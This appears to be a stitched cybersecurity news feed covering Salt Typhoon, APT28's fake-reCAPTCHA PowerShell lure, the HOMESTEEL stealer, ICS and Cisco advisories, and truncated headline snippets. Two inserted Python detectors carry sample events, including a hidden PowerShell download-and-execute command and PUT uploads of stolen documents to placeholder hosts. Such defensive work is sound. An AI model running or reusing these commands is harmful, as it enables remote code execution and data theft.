Chinese hackers who earlier this month infiltrated the U.S. wiretap system have apparently expanded their telecom network access to target data from phones used by Republican presidential candidate Donald Trump and vice presidential candidate JD Vance. The “Salt Typhoon” group apparently also targeted “prominent figures on Capitol Hill and possibly staff members of Vice President Kamala Harris’s campaign,” according to a New York Times report today, and the Wall Street Journal reported that companies were targeted too. The officials’ phone numbers were targeted “through the infiltration of Verizon phone systems,” the Times said.

In a joint statement today, the FBI and CISA said they are “investigating the unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People’s Republic of China.” The statement did not provide details but said the FBI “identified specific malicious activity targeting the sector.” FBI and CISA “immediately notified affected companies, rendered technical assistance, and rapidly shared information to assist other potential victims.” U.S. agencies “are collaborating to aggressively mitigate this threat and are coordinating with our industry partners to strengthen cyber defenses across the commercial communications sector,” the statement concluded.

Not Clear What Data Chinese Hackers Accessed

It’s not clear what data the hackers accessed and whether it included text messages. The investigation is ongoing, and the FBI and U.S. national security officials “have signaled that they are deeply concerned about the potential extent of compromised data and the wide range of possible victims,” the Times said. The hackers may still be inside Verizon’s systems, the report said. The Wall Street Journal reported that "Investigators now believe that the hackers gained access to U.S. telecommunications infrastructure and targeted or compromised at least several dozen different companies and people." They also targeted a Wall Street Journal reporter, the paper said.
Foreign Election Interference Widespread

Even by the standards of the last two presidential election cycles, the 2024 race has been marked by an extremely high level of foreign disinformation and hacking campaigns, with Russia, China and Iran the most active of those foreign actors. Perhaps most noteworthy was an August hack of the Trump campaign by Iran. The documents stolen by the Iranian hackers – which included a 271-page research dossier on Vance – have gone unpublished by U.S. media, but Reuters reported this week that some of those documents have begun to trickle out on Substack and other platforms. Earlier this week, a report by Microsoft said another Iranian group – “Cotton Sandstorm” – is targeting election-related websites and media outlets. The Microsoft report noted “sustained influence efforts by Russia, Iran, and China aimed at undermining U.S. democratic processes.” And The Washington Post this week reported on a former Florida deputy sheriff “who fled to Moscow and became one of the Kremlin’s most prolific propagandists,” working with Russian military intelligence to create deepfakes and circulate disinformation targeting the Harris campaign.

Election Infrastructure Secure; Disinformation is the Threat

Throughout the blizzard of disinformation and hacking campaigns, U.S. cybersecurity and national security officials have made clear that the U.S. election system is safe, and that disinformation is the much bigger problem. CISA Director Jen Easterly reiterated those views in a LinkedIn post this week. “Whoever you vote for, you can be confident that your vote will be counted as cast,” Easterly said. “Elections are political; election security is not. Despite the firehose of inaccurate info about election security being spread by foreign adversaries intent on weakening our country and pitting Americans against each other, the fact is that election infrastructure has never been more secure and our election officials have never been better prepared to deliver safe, secure, free, and fair elections.”

One top U.S. election observer – David Becker, executive director and founder of The Center for Election Innovation & Research – agrees that disinformation is the bigger risk. Becker notes that fewer than 2% of all U.S. voters this November will vote on machines without any paper ballot or backup, and those voters reside only in Louisiana (statewide) and a few counties in Texas. “The threat of ‘hacking’ of machines is quite overblown, given the success advocates have had in promoting paper ballots and audits nationwide, along with disconnection from the internet,” Becker told The Cyber Express earlier this fall in a report for Cyble. “It is a high risk, low reward endeavor, which, even if attempted, would almost certainly be detected and prosecuted, and the existence of verifiable paper ballots means the election could be reconstructed.”
Ukraine is confronting a new cyberattack vector from Russian military intelligence (GRU) connected hackers that is targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) recently uncovered an advanced phishing campaign by the Russian GRU-linked APT28, or "Fancy Bear." Using a novel approach, attackers lure recipients into executing malicious PowerShell commands directly from their clipboard, a new technique for delivering malware with minimal interaction.

Google's reCAPTCHA Lookalike

Emails flagged by CERT-UA were found circulating within local government offices under the subject line “Table Replacement.” Instead of standard attachments, these emails embed a link mimicking a Google spreadsheet. Clicking the link initiates an imitation of Google’s reCAPTCHA, a tactic used to disarm suspicion by mimicking a bot prevention screen. However, unlike legitimate reCAPTCHA prompts, this decoy performs an unseen action: it copies a malicious PowerShell command directly to the user's clipboard. Following this, instructions prompt users to press "Win+R," which opens the command prompt, followed by "Ctrl+V" to paste and then "Enter" to execute it. Once executed, the payload launches, compromising the system.

Figure: The Trojanized Google reCAPTCHA and the PowerShell scripts it runs. (Source: CERT-UA)

APT28's tactics demonstrate how these groups exploit familiar actions in routine tasks to mask their intentions. This technique capitalizes on basic system functions and leverages users’ trust in seemingly benign prompts, such as bot verification. CERT-UA analysis reveals that the command initiates a download and execution sequence. It launches “browser.hta,” a malicious HTML application, which in turn executes “Browser.ps1,” a PowerShell script designed to steal data from popular browsers, including Chrome, Edge, Opera, and Firefox. Additionally, it uses an SSH tunnel for exfiltration, allowing stolen credentials and other sensitive data to be transported directly to the attackers. One of the more concerning aspects is the script’s capability to download and run the Metasploit framework, a tool used widely in penetration testing but increasingly popular among threat actors.
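The clipboard-to-Run-dialog chain described above leaves a distinctive process-creation trail: explorer.exe spawning a script host with hidden-window and policy-bypass flags, a one-line download cradle, and the fake "I am not a robot" comment still attached to the command. The Python below is an added detection example (not code from the article or from CERT-UA) that scores constructed Sysmon-style events for that pattern; the C2 URL, file paths and event contents are placeholders, not the CERT-UA indicators.

```python
"""Flag the fake-reCAPTCHA 'copy, Win+R, paste, Enter' chain in process telemetry.

Added example: the events are constructed Sysmon-style process-creation records
(ParentImage / Image / CommandLine, tab-separated), not CERT-UA data.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

C2 = "https://c2.example.invalid"  # placeholder; the real host is in the CERT-UA IoCs

SAMPLE_EVENTS = [
    # 1: a local script run from the Run dialog, no remote content (should not alert)
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -File C:\\Tools\\cleanup.ps1",
    # 2: the pasted clipboard command: hidden window, no profile, policy bypass,
    #    iex download cradle, mshta follow-up and the fake-CAPTCHA comment
    "ParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -WindowStyle Hidden -nop -exec bypass -c \"iex (New-Object Net.WebClient)"
    f".DownloadString('{C2}/B');mshta {C2}/b # I am not a robot - reCAPTCHA ID: 8823\"",
    # 3: second stage, mshta fetching the HTML application from the same host
    "ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tImage=C:\\Windows\\System32\\mshta.exe"
    f"\tCommandLine=mshta {C2}/b",
    # 4: scheduled admin job using bypass flags but a local script (should not alert)
    "ParentImage=C:\\Windows\\System32\\svchost.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell -nop -exec bypass -File C:\\Ops\\inventory.ps1",
]

RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R and other interactive launches
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Flags the lure relies on to keep the window hidden and skip profile/policy.
EVASION_RE = re.compile(
    r"(?i)(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|"
    r"exec(?:utionpolicy)?\s+bypass|ep\s+bypass)\b")
# Cmdlets and aliases that fetch or evaluate remote code in a single line.
CRADLE_RE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|"
    r"iwr|invoke-restmethod|irm|start-bitstransfer)\b")
# The decoy appends a human-readable 'verification' comment to the pasted command.
LURE_RE = re.compile(r"(?i)i am not a robot|recaptcha|verification id")
REMOTE_HTA_RE = re.compile(r"(?i)\bmshta(?:\.exe)?\s+[\"']?https?://")


@dataclass
class Alert:
    event_no: int
    rule: str
    image: str
    reasons: list[str]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict[str, str]:
    """Split 'Key=Value<TAB>Key=Value' into a dict; values may themselves contain '='."""
    fields: dict[str, str] = {}
    for part in line.split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def evaluate(event: dict[str, str], event_no: int) -> list[Alert]:
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    alerts: list[Alert] = []
    flags = [m.strip() for m in EVASION_RE.findall(cmd)]
    cradles = CRADLE_RE.findall(cmd)
    lure = LURE_RE.search(cmd)
    # Rule 1: an interactive launch (explorer.exe parent) of a script host that
    # immediately pulls or evaluates remote content, or carries the lure's comment.
    if parent in RUN_DIALOG_PARENTS and image in SCRIPT_HOSTS and (cradles or lure):
        reasons = [f"parent {parent} (Run dialog / interactive launch)"]
        reasons += [f"download/eval cradle: {c}" for c in cradles]
        if lure:
            reasons.append(f"lure marker: {lure.group(0)!r}")
        reasons += [f"evasion flag: {f}" for f in flags]
        alerts.append(Alert(event_no, "run_dialog_cradle", image, reasons))
    # Rule 2: mshta handed a remote URL, whatever the parent (the browser.hta stage).
    if image == "mshta.exe" and REMOTE_HTA_RE.search(cmd):
        alerts.append(Alert(event_no, "remote_hta", image,
                            ["mshta executing a remote HTML application"]))
    return alerts


def scan(lines: list[str]) -> list[Alert]:
    alerts: list[Alert] = []
    for no, line in enumerate(lines, 1):
        alerts.extend(evaluate(parse_event(line), no))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"event {a.event_no}: {a.rule} ({a.image})")
        for r in a.reasons:
            print(f"    - {r}")
```

Rule 1 deliberately requires the explorer.exe parent so that scheduled or service-launched scripts with bypass flags (event 4) do not alert; rule 2 catches the mshta stage even when it is spawned by the first-stage PowerShell.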
Fancy Bear Gets Fancy with its Expanding Arsenal

This isn’t the first time Ukrainian entities have faced APT28’s targeted operations. CERT-UA reported in September that the group used a Roundcube email vulnerability (CVE-2023-43770) to redirect email data.

Figure: The malicious scripts run after Roundcube vulnerability exploitation. (Source: CERT-UA)

Exploiting this vulnerability enabled attackers to implant a filter that auto-forwarded emails to an attacker-controlled address. During that attack, CERT-UA found that at least ten compromised government email accounts were used to transmit further exploits to Ukrainian defense contacts. In both attacks, APT28 used a compromised server, mail.zhblz[.]com, for control. The IP linked to this server (203.161.50[.]145) has surfaced in prior campaigns, signifying APT28’s evolving operational infrastructure to evade detection while maintaining continuity across attacks. With APT28’s ongoing activity, CERT-UA has recommended that government agencies be on the lookout for increasingly targeted spear-phishing campaigns designed to exploit both user trust and routine tasks.
Also read: Russian Hacker Group APT28 Launches HeadLace Malware via Fake Car Ads to Target Diplomats

Indicators of Compromise Shared by CERT-UA
Cyble Research & Intelligence Labs (CRIL) has shared its weekly ICS vulnerability report, highlighting multiple vulnerabilities affecting industrial control systems (ICS). This weekly industrial control system vulnerability blog emphasizes the critical need for quick action in mitigating these threats. The findings were released by the Cybersecurity and Infrastructure Security Agency (CISA) for the week of October 15 to October 21, 2024, detailing 13 vulnerabilities spanning several well-known manufacturers, including Siemens and Schneider Electric.

ICS Vulnerability Report Sheds Light on Major Flaws

During the specified period, CISA published seven security advisories that spotlighted vulnerabilities across multiple companies, namely Siemens, Schneider Electric, Elvaco, Mitsubishi Electric, HMS Networks, Kieback&Peter, and LCDS – Leão Consultoria e Desenvolvimento de Sistemas Ltda ME. Among these, Elvaco reported four vulnerabilities, while Kieback&Peter highlighted three. Particular attention is drawn to vulnerabilities impacting the Elvaco CMe3100 and Kieback&Peter DDC4000 Series. The Elvaco CMe3100, a compact communication gateway designed for remote energy meter reading, has been exposed online in numerous instances (1,186 to be exact), primarily located in Sweden, according to Cyble’s ODIN scanner. In contrast, Kieback&Peter’s DDC4000 Series, utilized predominantly in HVAC management, has eight exposed instances that require immediate action.

Detailed Vulnerability Insights

The vulnerabilities reported offer essential insights that organizations should prioritize when planning their patching efforts. Among the critical vulnerabilities identified are:

CVE-2024-3506: This medium-severity vulnerability affects Siemens’ Siveillance Video Camera. All versions prior to V13.2 are susceptible to a classic buffer overflow, potentially compromising physical access controls and CCTV operations.

CVE-2023-8531: Schneider Electric's Data Center Expert is vulnerable in versions 8.1.1.3 and earlier. This high-severity flaw involves improper verification of cryptographic signatures, impacting various control systems including DCS, SCADA, and BMS.

CVE-2024-49396 and CVE-2024-49398: Elvaco's CMe3100, particularly version 1.12.1, faces critical risks from insufficiently protected credentials (CVE-2024-49396) and the unrestricted upload of dangerous file types (CVE-2024-49398).

CVE-2024-41717: Kieback&Peter’s DDC4002 and related versions encounter a critical path traversal vulnerability, which could significantly impact field controllers and IoT devices.

These findings highlight a troubling trend in the ICS sector, where high-severity vulnerabilities are increasingly prevalent. Organizations must remain vigilant and adopt robust mitigation strategies in response to the flaws highlighted in the weekly ICS vulnerability report.

Recommendations for Enhanced Cybersecurity

In light of the vulnerabilities highlighted in the weekly industrial control system vulnerability blog, Cyble Research & Intelligence Labs (CRIL) recommends that organizations actively monitor security advisories, adopt a risk-based vulnerability management approach with a Zero-Trust framework, and enhance patch management by tracking critical vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog. Additionally, organizations should develop comprehensive patch strategies that include inventory management, assessment, testing, deployment, and verification of patches, employing automation for greater efficiency. Effective network segmentation is essential to limit lateral movement of attackers, while ongoing audits, vulnerability assessments, and penetration testing are crucial for identifying and addressing security gaps. Establishing continuous monitoring and logging capabilities will allow for early detection of network anomalies, and leveraging a Software Bill of Materials (SBOM) can improve visibility into software components and their vulnerabilities.
With significant threats facing major vendors like Siemens and Schneider Electric, it is important for businesses to adopt these proactive measures to enhance their cybersecurity and protect critical infrastructure.
A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a new malware variant called HOMESTEEL that targets critical Ukrainian data repositories. This latest offensive, flagged by Ukraine’s Computer Emergency Response Team (CERT-UA), reflects the modus operandi of Ukraine's adversaries, who aim to steal sensitive information from government and business networks.

CERT-UA identified the phishing methods, which include emails baiting recipients through familiar subject lines like "account" and "details" and linking to a seemingly legitimate “eDisk” platform. The eDisk link directs users to download RAR files that house malicious content, embedding two password-protected files labeled “Contract20102024.doc” and “Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file, “Password.vbe,” ultimately initiates HOMESTEEL's data-siphoning operations. The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and “pdf,” are systematically collected from user directories up to five subfolders deep. HOMESTEEL’s code commands a recursive search, transmitting files under 10MB to an external server through an HTTP PUT request. This approach minimizes data size to evade potential detection while maximizing data collection.

HOMESTEEL's Proxy Use Elevates Attack Complexity

UAC-0218’s techniques appear particularly well-tailored to the environment. HOMESTEEL can adapt to proxy settings on compromised systems, further camouflaging its network traffic. CERT-UA reported that each outgoing request to the attacker’s server contains the full path of the extracted file, which may assist attackers in cataloging sensitive files across compromised systems. This level of customization suggests a level of surveillance intelligence typically seen in more complex, persistent attacks. A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a command-line shell in Windows environments widely exploited in cyber operations. CERT-UA researchers found an additional executable acting as a self-extracting archive with embedded PowerShell commands. These commands initiate further file reconnaissance, scanning user directories for extensions like xls*, doc*, pdf and eml, and dispatching files to a central server via HTTP POST requests. This dual approach showcases HOMESTEEL’s resilience, as it attempts to bypass any security hurdles the initial infection vector encounters.

Infrastructure Tactics Link Campaign to August Origins

The CERT-UA findings link UAC-0218’s activities back to August 2024, based on the domain registration data of its command infrastructure. Ukrainian cyber defenders on Wednesday revealed another campaign that began in August with a similar intent, but no links between the two could be established, as the threat actor in that case is tracked as UAC-0215. The attackers leveraged HostZealot, a domain name registrar, and configured a custom Python-based web server as the central data-receiving platform. The server reveals a distinctive "Python Software Foundation BaseHTTP 0.6" banner, helping analysts attribute this campaign to the same infrastructure used in prior UAC-0218 attacks. By reusing components across multiple operations, UAC-0218 demonstrates a persistent strategy that leverages existing digital assets to increase efficiency and reduce overhead. The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which has long battled cyber aggression. As cyber espionage campaigns against Ukraine continue to evolve, CERT-UA's proactive monitoring of UAC-0218 indicates a critical awareness of threats that leverage evolving malware tactics and refined phishing methodologies.
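Two details above are directly observable at a web proxy: each HOMESTEEL request carries the victim's full file path in the URL, and the receiving side is a bare Python web server that announces itself in its Server header. The Python below is an added example (not code from CERT-UA or the article) that walks constructed forward-proxy log lines and summarizes, per destination host, PUT/POST uploads whose URL path is really a Windows document path; the host names, paths, sizes and log format are constructed placeholders.

```python
"""Surface HOMESTEEL-style uploads in proxy logs: PUT/POST requests whose URL
path is the victim's own file path, often landing on a bare Python http.server.

Added example: the log lines, hosts, paths and sizes are constructed, not CERT-UA data.
Fields: time client method host path status request_bytes "Server response header".
"""
from __future__ import annotations

import re
import shlex
from dataclasses import dataclass, field
from urllib.parse import unquote

SAMPLE_PROXY_LOG = [
    '2024-10-21T09:14:02Z 10.0.0.15 GET intranet.corp.example /sites/finance/Q3.xlsx 200 0 "Microsoft-IIS/10.0"',
    '2024-10-21T09:15:40Z 10.0.0.15 PUT drop.example.invalid /C:%5CUsers%5Colena%5CDocuments%5CContract_2024.docx 200 184320 "BaseHTTP/0.6 Python/3.11.4"',
    '2024-10-21T09:15:41Z 10.0.0.15 PUT drop.example.invalid /C:%5CUsers%5Colena%5CDesktop%5CReports%5CQ3%5Cbudget.xlsx 200 90112 "BaseHTTP/0.6 Python/3.11.4"',
    '2024-10-21T09:15:43Z 10.0.0.15 PUT drop.example.invalid /C:%5CUsers%5Colena%5CScans%5Cinvoice.pdf 200 2411520 "BaseHTTP/0.6 Python/3.11.4"',
    '2024-10-21T09:16:05Z 10.0.0.15 POST intranet.corp.example /api/upload 200 52000 "Microsoft-IIS/10.0"',
    '2024-10-21T09:20:12Z 10.0.0.22 POST mirror.example.invalid /C:%5CUsers%5Cpetro%5CDocuments%5Cmail%5Cnotes.eml 200 7700 "BaseHTTP/0.6 Python/3.11.4"',
]

# Extensions HOMESTEEL collects (xls*, doc*, pdf, eml plus the PowerShell variant's extras).
DOC_EXT_RE = re.compile(r"\.(?:xls\w*|doc\w*|pdf|eml|sqlite|pst|txt)$", re.IGNORECASE)
# A URL path that is really a Windows absolute path: drive letter, colon, separator.
CLIENT_PATH_RE = re.compile(r"^/?([A-Za-z]:[\\/].+)$")
PY_SERVER_RE = re.compile(r"BaseHTTP/\d+\.\d+", re.IGNORECASE)  # python http.server banner
TEN_MB = 10 * 1024 * 1024                                       # HOMESTEEL's per-file cap
UPLOAD_METHODS = {"PUT", "POST"}


@dataclass
class HostSummary:
    host: str
    files: list[str] = field(default_factory=list)
    sizes: list[int] = field(default_factory=list)
    python_server: bool = False

    def reasons(self) -> list[str]:
        out = [f"{len(self.files)} upload(s) whose URL path is a client-side document path"]
        if all(s < TEN_MB for s in self.sizes):
            out.append("every upload under 10 MB, matching HOMESTEEL's size filter")
        if self.python_server:
            out.append("destination answers with a Python BaseHTTP server banner")
        return out


def parse_line(line: str) -> dict[str, str]:
    ts, client, method, host, path, status, nbytes, server = shlex.split(line)
    return {"time": ts, "client": client, "method": method, "host": host,
            "path": path, "status": status, "bytes": nbytes, "server": server}


def client_document_path(url_path: str) -> str | None:
    """Return the decoded Windows document path hidden in the URL, or None."""
    m = CLIENT_PATH_RE.match(unquote(url_path))
    if m and DOC_EXT_RE.search(m.group(1)):
        return m.group(1)
    return None


def analyze(lines: list[str]) -> list[HostSummary]:
    """Group suspicious uploads by destination host; hosts with none are dropped."""
    hosts: dict[str, HostSummary] = {}
    for line in lines:
        rec = parse_line(line)
        if rec["method"] not in UPLOAD_METHODS:
            continue
        doc = client_document_path(rec["path"])
        if doc is None:
            continue
        summary = hosts.setdefault(rec["host"], HostSummary(rec["host"]))
        summary.files.append(doc)
        summary.sizes.append(int(rec["bytes"]))
        summary.python_server |= bool(PY_SERVER_RE.search(rec["server"]))
    return list(hosts.values())


if __name__ == "__main__":
    for s in analyze(SAMPLE_PROXY_LOG):
        print(f"{s.host}: {', '.join(s.reasons())}")
        for name in s.files:
            print(f"    {name}")
```

The recovered paths double as a damage-assessment list: they name exactly which documents left each host, which is the same catalog the attacker receives.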
Indicators of Compromise as shared by CERT-UA
Cisco Systems released a critical advisory regarding a vulnerability in the Remote Access VPN (RAVPN) service associated with its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. This vulnerability could allow an unauthenticated, remote attacker to execute a denial of service (DoS) attack against the RAVPN service, impacting organizations relying on these essential security tools. The Common Vulnerability Scoring System (CVSS) score for this issue is 5.8. The vulnerability is identified as CVE-2024-20481 and falls under the CWE classification CWE-772.

Decoding Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software

The investigation into this Cisco vulnerability revealed that it stems from resource exhaustion. An attacker could exploit this weakness by sending many VPN authentication requests to an affected device.

Figure (Source: Cisco)

Such an assault could exhaust system resources, resulting in a complete denial of service for the RAVPN service. In the event of a successful exploitation, the affected device may need to be rebooted to restore functionality. Importantly, services unrelated to the VPN remain unaffected by this vulnerability. Cisco's security research team recently highlighted the rising trend of brute-force attacks targeting VPNs and SSH services that leverage commonly used login credentials. This advisory highlights the critical need for better security measures in network environments.

Impacted Products

At the time of the advisory's publication, Cisco ASA and FTD software running vulnerable releases with the RAVPN service enabled were at risk. Organizations using these products should verify their software version against the advisory's guidelines to determine vulnerability status. Notably, there are currently no workarounds available to mitigate this specific vulnerability, making immediate action essential for affected users. Cisco has confirmed that several of its products are not affected by the identified vulnerability. The products that are considered non-vulnerable include IOS Software, IOS XE Software, and Meraki products. Additionally, NX-OS Software and Secure Firewall Management Center (FMC) Software are also confirmed to be unaffected.

Organizations can check whether the SSL VPN feature is enabled on their devices by executing the command show running-config webvpn | include ^ enable. If the command returns output, SSL VPN is active; if it returns no output, the feature is not enabled and the device is therefore not vulnerable. For example, if the command returns enable outside, the SSL VPN feature is enabled, which may indicate that the device is vulnerable.

Recommendations for Mitigation

Cisco emphasizes the importance of upgrading to the latest software versions to address the vulnerability, as there are no direct workarounds available. Organizations should regularly consult Cisco’s security advisories to stay informed and ensure they are using updated software. When upgrading Cisco ASA or FTD devices, it's crucial to check for sufficient memory and compatibility with current hardware. After upgrading, organizations should review the "Configure Threat Detection for VPN Services" section in the Cisco Secure Firewall ASA CLI Configuration Guide to enhance protections against various VPN-related attacks. The advisory highlights the urgent need for organizations using Cisco Adaptive Security Appliance and Firepower Threat Defense Software to respond promptly to the identified vulnerability affecting the Remote Access VPN service. Proactive monitoring, timely upgrades, and strong security practices are essential for safeguarding network infrastructures. For further details, organizations can refer to the full advisory linked in the original document. It’s vital to implement the recommended actions to mitigate risks and remain vigilant against online threats.
Four companies — Avaya, Check Point, Mimecast, and Unisys — have been charged by the SEC for misleading disclosures in the aftermath of the 2020 SolarWinds compromise.
Faraday is a tool that introduces a new concept called IPE, or Integrated Penetration-Test Environment. It is a multiuser penetration test IDE designed for distribution, indexation and analysis of the generated data during the process of a security audit. The main purpose of Faraday is to re-use the available tools in the community to take advantage of them in a multiuser way.
Red Hat Security Advisory 2024-8455-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.
Red Hat Security Advisory 2024-8449-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a buffer overflow vulnerability.
Red Hat Security Advisory 2024-8263-03 - Red Hat OpenShift Container Platform release 4.16.18 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Security Advisory 2024-8260-03 - Red Hat OpenShift Container Platform release 4.16.18 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.
The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising. "The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data
Apple has publicly made available its Private Cloud Compute (PCC) Virtual Research Environment (VRE), allowing the research community to inspect and verify the privacy and security guarantees of its offering. PCC, which Apple unveiled earlier this June, has been marketed as the "most advanced security architecture ever deployed for cloud AI compute at scale." With the new technology, the idea is
Artificial Intelligence (AI) has rapidly evolved from a futuristic concept to a potent weapon in the hands of bad actors. Today, AI-based attacks are not just theoretical threats—they're happening across industries and outpacing traditional defense mechanisms. The solution, however, is not futuristic. It turns out a properly designed identity security platform is able to deliver defenses
The U.S. Securities and Exchange Commission (SEC) has charged four current and former public companies for making "materially misleading disclosures" related to the large-scale cyber attack that stemmed from the hack of SolarWinds in 2020. The SEC said the companies – Avaya, Check Point, Mimecast, and Unisys – are being penalized for how they handled the disclosure process in the aftermath of
A security flaw impacting the Wi-Fi Test Suite could enable unauthenticated local attackers to execute arbitrary code with elevated privileges. The CERT Coordination Center (CERT/CC) said the vulnerability, tracked as CVE-2024-41992, lies in susceptible code from the Wi-Fi Alliance that has been found deployed on Arcadyan FMIMG51AX000J routers. "This flaw allows an unauthenticated local attacker to
A US $10 million reward is being offered to anyone who has information about four members of an Iranian hacking group. The US government's Rewards for Justice initiative is making the reward available for information about four men believed to be members of Shahid Hemmat, a hacking gang backed by Iran's Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC). Read more in my article on the Hot for Security blog.